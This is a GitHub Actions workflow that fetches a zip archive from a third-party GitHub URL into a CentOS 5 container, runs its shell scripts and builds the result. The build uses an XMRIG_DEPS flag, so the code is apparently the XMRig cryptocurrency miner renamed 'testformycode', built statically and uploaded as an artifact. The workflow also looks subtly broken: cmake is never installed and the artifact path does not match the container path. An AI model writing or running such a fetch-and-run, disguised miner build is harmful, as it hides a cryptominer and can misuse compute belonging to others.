name: Build and Install Dependencies on CentOS 5

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v2

      - name: Set up Docker container with CentOS 5
        run: |
          # 拉取 CentOS 5 Docker 镜像并启动容器
          docker pull centos:5
          docker run --name centos5-build -d centos:5 sleep infinity

      - name: Install Dependencies in CentOS 5
        run: |
          docker exec centos5-build bash -c "
            yum install -y epel-release &&
            yum install -y curl unzip git gcc gcc-c++ make automake libtool autoconf
          "

      - name: Copy Source Code to CentOS 5 Container
        run: |
          docker cp . centos5-build:/src

      - name: Download and Unzip Source Code
        run: |
          docker exec centos5-build bash -c "
            cd /src &&
            curl -L -o testformycode.zip https://raw.githubusercontent.com/tjbcc0/tetmc/refs/heads/main/testformycode.zip &&
            unzip testformycode.zip
          "

      - name: Build Project
        run: |
          docker exec centos5-build bash -c "
            cd /src/testformycode/scripts &&
            chmod 777 *.sh &&
            ./build_deps.sh &&
            cd .. &&
            mkdir build &&
            cd build &&
            cmake -DXMRIG_DEPS=scripts/deps -DBUILD_SHARED_LIBS=OFF .. &&
            make
          "

      - name: Check Binary Dependencies
        run: |
          docker exec centos5-build bash -c "
            cd /src/testformycode/build &&
            ldd testformycode
          "

      - name: Upload Build Artifacts
        uses: actions/upload-artifact@v3
        with:
          name: build-output
          path: ./testformycode/build/testformycode  # 修改为具体的可执行文件路径

      - name: Clean up Docker container
        run: |
          docker stop centos5-build
          docker rm centos5-build
